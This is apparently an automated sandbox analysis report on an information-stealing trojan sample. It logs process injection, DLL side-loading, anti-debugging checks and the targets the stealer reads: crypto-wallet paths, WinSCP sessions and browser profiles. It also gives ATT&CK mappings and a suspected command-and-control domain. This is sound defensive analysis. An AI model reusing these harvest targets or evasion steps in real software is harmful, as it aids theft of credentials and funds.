Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A46CD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D0A46CD
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0926E8 _wcscpy,_wcscpy,_wcscpy,_wcscpy,SetErrorMode,SetUnhandledExceptionFilter,2_2_6D0926E8
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0AD4E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D0AD4E7
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C14AD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6C14AD2C
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D07A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6C0D07A7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF6FA0DAFF7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA002902Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA120B17Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA155603Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF6FA1EEB76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF6FA1737A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA08B5DBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA091DA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF6FA1A3594Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FFD233Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA155695Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA09DEC3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFBCB7626A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA08548AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA1EFE30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA147DC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA148C5DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0D7905Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6FA0AD451Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 289010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 3F4010Jump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093DA1F InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_0093DA1F
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093B493 AllocateAndInitializeSid,CheckTokenMembership,0_2_0093B493
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1526451147.000000006CA8E000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000004.00000002.1588722536.000000006B8DE000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00927255 cpuid 0_2_00927255
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D0B4C5D
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_6D0B4C99
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_6D0B490A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_6D0B4965
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_6D0B4863
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_6D0B4B36
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D0B4BF6
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_6D0AC51C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6D0B476E
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D0B428A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D0B3F9C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_6D0B5593
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_6D0B54B9
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_6D0A94E4
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoA,2_2_6D0AB4F8
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_6D0B3340
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,3_2_6C0D750C
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,3_2_6C0D767A
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,3_2_6C0D7270
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,3_2_6C0D52E4
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C14F2EF
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6C14F356
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe | Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,3_2_6C0D73B4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 0_2_008FBB84 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,LocalFree,0_2_008FBB84
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 0_2_0093A805 EnterCriticalSection,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,LeaveCriticalSection,0_2_0093A805
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 0_2_008E9360 GetUserNameW,GetLastError,0_2_008E9360
Source: C:\Users\user\Desktop\kXzODlqJak.exe | Code function: 0_2_0094BA41 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_0094BA41
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe | Code function: 2_2_6D0928F4 __EH_prolog3_GS,_memset,GetVersionExW,GetVersionExW,GetVersionExW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,2_2_6D0928F4
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: wallets\Electrum
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb{
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: r\??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2224244661.000000000053F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: t\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kz8kl7vh.default
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | Directory queried: C:\Users\user\Documents

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 12 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 21 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | Logon Script (Windows) | 1 Access Token Manipulation | 4 Obfuscated Files or Information | Security Account Manager | 13 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Windows Service | 1 Software Packing | NTDS | 147 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 213 Process Injection | 11 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 213 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

[Behavior graph omitted. Behavior Graph ID: 1586711; Sample: kXzODlqJak.exe; Startdate: 09/01/2025; Architecture: WINDOWS; Score: 100]

SourceDetectionScannerLabelLink
kXzODlqJak.exe45%ReversingLabsWin32.Trojan.Nekark
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe3%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtCore4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtGui4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtNetwork4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtXml4.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe3%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\StarBurn.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcp100.dll0%ReversingLabs
C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe29%ReversingLabsWin32.Trojan.Generic
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://wixtoolset.org/schemas/v4/BundleExtensionData | 0% | Avira URL Cloud | safe |
http://wixtoolset.org/schemas/v4/2008/BurnHd | 0% | Avira URL Cloud | safe |
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa | 0% | Avira URL Cloud | safe |
https://bamarelakij.site/roi | 0% | Avira URL Cloud | safe |
https://ntp.msn.comcache-control:public | 0% | Avira URL Cloud | safe |
https://bamarelakij.site/roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m | 0% | Avira URL Cloud | safe |
http://wixtoolset.org/schemas/v4/BootstrapperApplicationData | 0% | Avira URL Cloud | safe |
https://dns.levonet.sk/dns-query | 0% | Avira URL Cloud | safe |
https://ntp.msn.comcache-controlpublic | 0% | Avira URL Cloud | safe |
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply() | 0% | Avira URL Cloud | safe |
http://wixtoolset.org/schemas/v4/2008/Burn | 0% | Avira URL Cloud | safe |
http://bugreports.qt-project.org/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
sb.scorecardresearch.com | 18.244.18.32 | true | false | | high
googlehosted.l.googleusercontent.com | 142.250.185.161 | true | false | | high
bamarelakij.site | 104.21.80.52 | true | false | | high
clients2.googleusercontent.com | unknown | unknown | false | | high
bzib.nelreports.net | unknown | unknown | false | | high
assets.msn.com | unknown | unknown | false | | high
c.msn.com | unknown | unknown | false | | high
ntp.msn.com | unknown | unknown | false | | high
api.msn.com | unknown | unknown | false | | high
assets2.msn.com | unknown | unknown | false | | high
                                                                                                                                      high
                                                                                                                                      https://downloads.reneelab.com.cn/passnow/passnow_RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://appsyndication.org/2006/appsynkXzODlqJak.exefalse
                                                                                                                                          high
                                                                                                                                          http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
